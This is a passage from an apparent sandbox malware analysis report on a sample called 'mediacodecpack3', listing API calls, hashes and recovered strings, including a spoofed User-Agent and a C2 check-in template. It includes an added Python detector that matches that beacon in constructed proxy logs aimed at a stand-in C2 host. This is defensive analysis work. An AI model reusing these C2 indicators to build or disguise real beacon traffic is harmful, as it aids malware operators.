                                                                                            • _malloc.LIBCMT ref: 02B95F41
                                                                                            • _malloc.LIBCMT ref: 02B95F4C
                                                                                            • _malloc.LIBCMT ref: 02B95F57
                                                                                            • _malloc.LIBCMT ref: 02B95F62
                                                                                            • _malloc.LIBCMT ref: 02B95F6D
                                                                                            • _malloc.LIBCMT ref: 02B95F78
                                                                                            • _malloc.LIBCMT ref: 02B95F84
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02B95F9B
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FA4
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02B95FB0
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FB3
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02B95FBE
                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02B95FC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion
                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$OQ$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat
                                                                                            • API String ID: 2374473808-1738318132
                                                                                            • Opcode ID: 01284d3676701df339eb93289850884f6e6549ad174304d8d4b546153b7158a9
                                                                                            • Instruction ID: b9d424135be938240139fbe40611af9e249c28be490067cbb3147160e07ae6a0
                                                                                            • Opcode Fuzzy Hash: 01284d3676701df339eb93289850884f6e6549ad174304d8d4b546153b7158a9
                                                                                            • Instruction Fuzzy Hash: 25A13671D4C3809FD722AF78A854B9BBFE8AF49350F5408ADF588D7241DBB44905CB92
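The initialisation function above resolves sprintf and strcat from ntdll and carries both a hard-coded User-Agent and a sprintf() template for the check-in query string; the same two strings appear in the function listed at the top of this section. The User-Agent claims "Windows NT 9.0", a version that does not exist, so the exact string is a reliable match for proxy and IDS rules, and the template fixes the parameter names, their order and their numeric formats (gpt is eight hex digits, hp and lp are hex, os is three decimal fields with a zero-padded build number). The following added example (not code from the report or from the sample) compiles the template into a regular expression and runs both signals over constructed proxy log lines; the tab-separated log layout and the hostnames are assumptions made for the example.

```python
# Added example: turn the sprintf() beacon template and the hard-coded User-Agent
# from the report into a detection and run it over constructed proxy log lines.
# Not part of the Joe Sandbox report or the sample; the log layout and hostnames
# below are made up for the example.

import re
from urllib.parse import urlsplit

# Strings recovered from the sample's memory (see the String ID fields in the report).
BEACON_FORMAT = "gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d"
FAKE_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"

# printf conversion: %[flags][width][.precision]conv, integer conversions only.
_CONV = re.compile(r"%(?P<flags>[-+ 0#]*)(?P<width>\d*)(?:\.(?P<prec>\d+))?(?P<conv>[dixXu])")


def format_to_regex(fmt: str) -> "re.Pattern":
    """Compile a printf-style template into a regex that matches its output.

    %x with a precision becomes a fixed-width hex field, %x without one any hex run;
    %d with a zero-padded width becomes a minimum-width digit field, plain %d any
    integer. Everything else in the template is matched literally.
    """
    out, pos = [], 0
    for m in _CONV.finditer(fmt):
        out.append(re.escape(fmt[pos:m.start()]))
        conv, width, prec = m.group("conv"), m.group("width"), m.group("prec")
        if conv in "xX":
            n = int(prec) if prec else None
            out.append(r"[0-9a-fA-F]{%d}" % n if n else r"[0-9a-fA-F]+")
        else:
            n = int(width) if width else None
            zero_padded = n is not None and "0" in m.group("flags")
            out.append(r"-?\d{%d,}" % n if zero_padded else r"-?\d+")
        pos = m.end()
    out.append(re.escape(fmt[pos:]))
    return re.compile("^" + "".join(out) + "$")


BEACON_RE = format_to_regex(BEACON_FORMAT)


def classify(url: str, user_agent: str) -> set:
    """Return the set of signals a request triggers (empty set = nothing seen).

    The two signals are independent: the impossible User-Agent is cheap to match
    anywhere, the query-string shape survives a change of User-Agent.
    """
    reasons = set()
    if user_agent == FAKE_UA:
        reasons.add("fake-user-agent")
    if BEACON_RE.match(urlsplit(url).query):
        reasons.add("beacon-query")
    return reasons


def scan_proxy_log(lines):
    """Return (line_number, reasons) for every line that triggers a signal.

    Constructed layout: tab-separated timestamp, client IP, method, URL, User-Agent.
    Malformed lines are skipped rather than aborting the scan.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 5:
            continue
        _ts, _client, _method, url, ua = parts
        reasons = classify(url, ua)
        if reasons:
            hits.append((n, reasons))
    return hits


# Constructed sample log: one benign request, one full check-in, one check-in with a
# different User-Agent, one fake-User-Agent request to a benign site, one near miss.
_BEACON_URL = ("http://c2.invalid/?gpt=0a1b2c3d&advizor=1&box=0&hp=1f90&lp=438"
               "&line=3&os=10.0.19045&flag=1&itd=0")
_REAL_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SAMPLE_LOG = [
    "2024-12-19T10:00:00Z\t10.0.0.5\tGET\thttp://example.org/index.html\t" + _REAL_UA,
    "2024-12-19T10:00:01Z\t10.0.0.5\tGET\t" + _BEACON_URL + "\t" + FAKE_UA,
    "2024-12-19T10:00:02Z\t10.0.0.7\tGET\t" + _BEACON_URL + "\t" + _REAL_UA,
    "2024-12-19T10:00:03Z\t10.0.0.9\tGET\thttp://example.org/\t" + FAKE_UA,
    "2024-12-19T10:00:04Z\t10.0.0.9\tGET\thttp://c2.invalid/?gpt=0a1b2c3d&advizor=1&box=0\t" + _REAL_UA,
]

if __name__ == "__main__":
    for n, reasons in scan_proxy_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(sorted(reasons))}")
```

The regex is anchored to the whole query string, so a request that reorders or drops a parameter does not match; if the operator changes the template, only BEACON_FORMAT needs updating.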

                                                                                             Control-flow Graph (graph image not preserved; summary of the basic-block listing)
                                                                                             • Function entry 2b963f5, blocks spanning 2b960f0-2b96b6c; the loop repeats Sleep and RtlEnterCriticalSection/RtlLeaveCriticalSection around the internal calls, with a second Sleep at 2b96774 before the response handling
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02B96104
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B9610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96120
                                                                                              • Part of subcall function 02BA27C5: _malloc.LIBCMT ref: 02BA27DD
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B964A3
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B964B4
                                                                                            • _malloc.LIBCMT ref: 02B9653B
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B9654D
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96559
                                                                                            • _malloc.LIBCMT ref: 02B9662A
                                                                                            • _strtok.LIBCMT ref: 02B9665B
                                                                                            • _swscanf.LIBCMT ref: 02B96672
                                                                                            • _strtok.LIBCMT ref: 02B96689
                                                                                            • _free.LIBCMT ref: 02B96695
                                                                                            • Sleep.KERNEL32(000007D0), ref: 02B96779
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B967FF
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96811
                                                                                              • Part of subcall function 02B9873B: __EH_prolog.LIBCMT ref: 02B98740
                                                                                              • Part of subcall function 02B9873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 02B987BB
                                                                                              • Part of subcall function 02B9873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02B987D9
                                                                                            • _sprintf.LIBCMT ref: 02B9689B
                                                                                            • RtlEnterCriticalSection.NTDLL(00000020), ref: 02B96960
                                                                                            • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02B96994
                                                                                              • Part of subcall function 02B95C11: _malloc.LIBCMT ref: 02B95C1F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
                                                                                            • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                            • API String ID: 753742866-2823103634
                                                                                            • Opcode ID: 457483c3453f37689e1abcd52d177ec6ec87032c06d45f5f9ad04860e7ad8a6e
                                                                                            • Instruction ID: d7f018e925181f174fc20f18817f2e1792d3a82a8fdc9bd4a745086d1309d6ca
                                                                                            • Opcode Fuzzy Hash: 457483c3453f37689e1abcd52d177ec6ec87032c06d45f5f9ad04860e7ad8a6e
                                                                                            • Instruction Fuzzy Hash: 2912353160C3819FEB359F24D860BAFBBE9EFC5314F1048ADE48997291EBB09444CB52

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02B91D11
                                                                                            • GetLastError.KERNEL32 ref: 02B91D23
                                                                                              • Part of subcall function 02B91712: __EH_prolog.LIBCMT ref: 02B91717
                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02B91D59
                                                                                            • GetLastError.KERNEL32 ref: 02B91D6B
                                                                                            • __beginthreadex.LIBCMT ref: 02B91DB1
                                                                                            • GetLastError.KERNEL32 ref: 02B91DC6
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02B91DDD
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02B91DEC
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02B91E14
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02B91E1B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                            • String ID: thread$thread.entry_event$thread.exit_event
                                                                                            • API String ID: 831262434-3017686385
                                                                                            • Opcode ID: f9c4fe761219e00e981c264df8fb8ef2a3975daa5cb36733588eab2a06474fe7
                                                                                            • Instruction ID: 695aa47dc5e4e5fd1b8cd44ee7d8056213f684c8a7001f044467dbfb6056a3af
                                                                                            • Opcode Fuzzy Hash: f9c4fe761219e00e981c264df8fb8ef2a3975daa5cb36733588eab2a06474fe7
                                                                                            • Instruction Fuzzy Hash: 99318F719143029FDB11EF28C848B6BBBA9EF84750F5089ADF859C7290DB709849CFD2

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B94D8B
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B94DB7
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B94DC3
                                                                                              • Part of subcall function 02B94BED: __EH_prolog.LIBCMT ref: 02B94BF2
                                                                                              • Part of subcall function 02B94BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02B94CF2
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B94E93
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B94E99
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B94EA0
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B94EA6
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B950A7
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B950AD
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B950B8
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B950C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                            • String ID:
                                                                                            • API String ID: 2062355503-0
                                                                                            • Opcode ID: afbed72ed598976540a229a81139f0185111744ac02cc239036881ad044f85ac
                                                                                            • Instruction ID: 95db8075c80db3e51ea55cc7d0f1d4a293191303362d692824beb4f6ebbcd62b
                                                                                            • Opcode Fuzzy Hash: afbed72ed598976540a229a81139f0185111744ac02cc239036881ad044f85ac
                                                                                            • Instruction Fuzzy Hash: 4EB15D71D0425DDFEF25DFA0D854BEEBBB9AF04318F1040AAE41976280DBB45A49CFA1

                                                                                            Control-flow Graph

                                                                                             Control-flow graph (interactive rendering not reproduced; basic blocks that reach an API): 401301-40135e FindResourceA; 401367-40137d SizeofResource; 401386-4013fe LoadResource, LockResource, GlobalAlloc, then two calls to 402490; 40141f-401428 GetTickCount; 4014f0-401525 GlobalAlloc, call 401000; the function exits through 401538-40153c.
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                            • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindSizeof
                                                                                            • String ID:
                                                                                            • API String ID: 3019604839-3916222277
                                                                                            • Opcode ID: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                            • Instruction ID: 779852d327d389dbbb2f1b261a2bb7141e3a4eae573781fe7d13a424a4f3f89b
                                                                                            • Opcode Fuzzy Hash: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                            • Instruction Fuzzy Hash: F1811075D04258DFDF01CFE8D985AEEBBB0BF09305F1400AAE581B7262C3385A84DB69

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02B92706
                                                                                            • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02B9272B
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BB3173), ref: 02B92738
                                                                                              • Part of subcall function 02B91712: __EH_prolog.LIBCMT ref: 02B91717
                                                                                            • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02B92778
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02B927D9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID: timer
                                                                                            • API String ID: 4293676635-1792073242
                                                                                            • Opcode ID: 1bc7f3047247dcb619e6d1535c0c4bc915be8c24a6252e4ac1298b469f7ef16d
                                                                                            • Instruction ID: 5e87c21ba2f219a1eccc38b859a1d8522b60e13e94c04dd67f1f6a43c7556ed1
                                                                                            • Opcode Fuzzy Hash: 1bc7f3047247dcb619e6d1535c0c4bc915be8c24a6252e4ac1298b469f7ef16d
                                                                                            • Instruction Fuzzy Hash: 4231BCB1908705AFD711DF25D884B66BBE8FB48765F404A6EF81593A80D7B5E800CFA2

                                                                                            Control-flow Graph

                                                                                             Control-flow graph (interactive rendering not reproduced; basic blocks that reach an API): 2b91ba7-2b91bcf call 2bb2a10, RtlEnterCriticalSection; 2b91be9-2b91bf7 RtlLeaveCriticalSection, call 2b9d334; 2b91bfa-2b91c20 RtlEnterCriticalSection; 2b91bd4-2b91be0 and 2b91c22-2b91c2f call 2b91b79; 2b91c55-2b91c6e RtlLeaveCriticalSection.
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B91BAC
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02B91BBC
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02B91BEA
                                                                                            • RtlEnterCriticalSection.NTDLL ref: 02B91C13
                                                                                            • RtlLeaveCriticalSection.NTDLL ref: 02B91C56
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 1633115879-0
                                                                                            • Opcode ID: 3b9a586a0c135a4520c2762469b1fe9d251f51f2d1e1add0be0e48b9e303a3f8
                                                                                            • Instruction ID: a177d8d897b0e362193c7236fd781b699c5c242afacd02a869a82a6ff1cca7b1
                                                                                            • Opcode Fuzzy Hash: 3b9a586a0c135a4520c2762469b1fe9d251f51f2d1e1add0be0e48b9e303a3f8
                                                                                            • Instruction Fuzzy Hash: 61218875A04205ABDB15CF68C4447AABBB9FF48324F108599E81DAB301D7B1E905DBE0

                                                                                            Control-flow Graph

                                                                                             Control-flow graph (interactive rendering not reproduced; basic blocks that reach an API, entry at 2b960f5): 2b96104 Sleep; 2b9610a-2b96448 RtlEnterCriticalSection, RtlLeaveCriticalSection; 2b9649e-2b964c9 RtlEnterCriticalSection, RtlLeaveCriticalSection, call 2ba134c; 2b96539-2b965e4 call 2ba1fbc, RtlEnterCriticalSection, RtlLeaveCriticalSection, five calls to 2ba3760, two calls to 2b9439c; 2b966c9-2b9676d calls 2b99853, 2b93863, 2b95119, 2b93863, 2b99af9, 2b99c13; 2b96774-2b9679f Sleep, call 2ba0900; 2b967e7-2b96821 call 2ba3760, RtlEnterCriticalSection, RtlLeaveCriticalSection; 2b96886-2b96955 call 2ba1428, call 2b91ba7; 2b9695c-2b9697d RtlEnterCriticalSection; 2b96989-2b969f0 RtlLeaveCriticalSection, calls 2b93c67, 2b93d7e, 2b9733f; 2b969f6-2b96a38, 2b96a4f-2b96a94 and 2b96aaa-2b96ae5 call 2b99729; 2b96ae7-2b96b21 call 2b9c11b; 2b96b22-2b96b53 call 2b973ee, call 2b933b2; 2b96b58-2b96b6c call 2b98007. The remaining blocks are internal calls (2ba134c, 2b9439c, 2ba25f6, 2ba1860, 2ba27c5, 2b9873b, 2b9380b, 2b94100, 2b95c11, 2b95d1f, 2b9143f) and the loop returns to 2b960f0-2b960f2.
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(0000EA60), ref: 02B96104
                                                                                            • RtlEnterCriticalSection.NTDLL(02BC4FD0), ref: 02B9610F
                                                                                            • RtlLeaveCriticalSection.NTDLL(02BC4FD0), ref: 02B96120
                                                                                            Strings
                                                                                            • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02B96129
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeaveSleep
                                                                                            • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                            • API String ID: 1566154052-1923541051
                                                                                            • Opcode ID: 948de24367023195f1b302703f89288894d563acacd716c7c007af42a1eb21e7
                                                                                            • Instruction ID: f6add51123e67a1f86f4c81a8af9295c94c790258d7dbd5c75a0834521fb83b0
                                                                                            • Opcode Fuzzy Hash: 948de24367023195f1b302703f89288894d563acacd716c7c007af42a1eb21e7
                                                                                            • Instruction Fuzzy Hash: 46F0CD3298C3C08FDB138B60A8A8AA53F74AF5B314B4A05DAF4869B063C1D51845C7B3

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetVersion.KERNEL32 ref: 00402A46
                                                                                              • Part of subcall function 00403B64: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                              • Part of subcall function 00403B64: HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                            • GetCommandLineA.KERNEL32 ref: 00402A94
                                                                                            • GetStartupInfoA.KERNEL32(?), ref: 00402ABF
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402AE2
                                                                                              • Part of subcall function 00402B3B: ExitProcess.KERNEL32 ref: 00402B58
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                            • String ID:
                                                                                            • API String ID: 2057626494-0
                                                                                            • Opcode ID: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                            • Instruction ID: 5f87248e4510ca7a7a053da507506fe2897125482441b09741c869e2758f94b2
                                                                                            • Opcode Fuzzy Hash: 81c04d43b3f46c58329c6832fe0805ef85b64df99fa32ea28edf2ad19d5a1781
                                                                                            • Instruction Fuzzy Hash: BA214CB19006159ADB04AFA6DE49A6E7FA8EB04715F10413FF905BB2D1DB384900CA6C

                                                                                            Control-flow Graph

                                                                                             Control-flow graph (interactive rendering not reproduced; basic blocks that reach an API): 2b92edd-2b92f1f WSASetLastError, WSASocketA, call 2b9fb20, WSAGetLastError; 2b92f27-2b92f36 setsockopt (reached through the conditional block 2b92f21-2b92f25); 2b92f3c-2b92f47 call 2b9fb20; exit at 2b92f49-2b92f4f.
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B92EEE
                                                                                            • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02B92EFD
                                                                                            • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02B92F0C
                                                                                            • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02B92F36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Socketsetsockopt
                                                                                            • String ID:
                                                                                            • API String ID: 2093263913-0
                                                                                            • Opcode ID: e8f26e4a7143b29702206be0d782cb302aad70d932d4a4a3229fbfc9b9218005
                                                                                            • Instruction ID: e88da107fd984a6597f15e55425e30fa437dcf61fe0aa4bb7e6abf61f5eb0cb7
                                                                                            • Opcode Fuzzy Hash: e8f26e4a7143b29702206be0d782cb302aad70d932d4a4a3229fbfc9b9218005
                                                                                            • Instruction Fuzzy Hash: C1018871900304BBDF215F65DC88B9B7BADDB857B1F008565F918CB181D7B088008BA1
                                                                                            APIs
                                                                                              • Part of subcall function 02B92D39: WSASetLastError.WS2_32(00000000), ref: 02B92D47
                                                                                              • Part of subcall function 02B92D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02B92D5C
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B92E6D
                                                                                            • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02B92E83
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Sendselect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 2958345159-280543908
                                                                                            • Opcode ID: c86ef393773f79d1979ef54a490986b267f15d4fdeac5879dc2a309e773fbd25
                                                                                            • Instruction ID: 8e56458cd38e803eda881a5de859c75aaae1928e0dc8bc865060cac72f4376a1
                                                                                            • Opcode Fuzzy Hash: c86ef393773f79d1979ef54a490986b267f15d4fdeac5879dc2a309e773fbd25
                                                                                            • Instruction Fuzzy Hash: DD317CB1E10205ABDF109F68D8547EEBBAAEF05364F0045FADC08D7240E77595558FA0
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B92AEA
                                                                                            • connect.WS2_32(?,?,?), ref: 02B92AF5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastconnect
                                                                                            • String ID: 3'
                                                                                            • API String ID: 374722065-280543908
                                                                                            • Opcode ID: c78ef114fa5e805979ec77fe6d584430e2bea5fc2b456ff55399331a77e00742
                                                                                            • Instruction ID: 78d7b4feea0e5896fd60dc809c28842a1bada9ad22663b9b9474489f284965e4
                                                                                            • Opcode Fuzzy Hash: c78ef114fa5e805979ec77fe6d584430e2bea5fc2b456ff55399331a77e00742
                                                                                            • Instruction Fuzzy Hash: 17219275E00204ABDF10AFB8D4146AEBBFAEF44364F0081E9DD1897280DB744A018B91
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 3519838083-0
                                                                                            • Opcode ID: 9cae0934772d073e561a79dc7f1e82f9395975d90d7b1cb8e1af30e72c1b2d4e
                                                                                            • Instruction ID: 04b62df590bbd575fe8e150b1f4f4f5e973c33f2bde6b62f7b58d116a568f82f
                                                                                            • Opcode Fuzzy Hash: 9cae0934772d073e561a79dc7f1e82f9395975d90d7b1cb8e1af30e72c1b2d4e
                                                                                            • Instruction Fuzzy Hash: 70514CB1904206DFCF19DF68D5516AABBF1FF08320F1481AEE8299B391D7749911CFA1
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02B936A7
                                                                                              • Part of subcall function 02B92420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02B92432
                                                                                              • Part of subcall function 02B92420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02B92445
                                                                                              • Part of subcall function 02B92420: RtlEnterCriticalSection.NTDLL(?), ref: 02B92454
                                                                                              • Part of subcall function 02B92420: InterlockedExchange.KERNEL32(?,00000001), ref: 02B92469
                                                                                              • Part of subcall function 02B92420: RtlLeaveCriticalSection.NTDLL(?), ref: 02B92470
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1601054111-0
                                                                                            • Opcode ID: 2b10a1f7c2b1f0600840dc9aead60e26cacef0549d1b594724e00e56d505a95f
                                                                                            • Instruction ID: bbc913419e3dd1851f39e04f831ae599eebbe565f5987153de7b2dac81a8c9b2
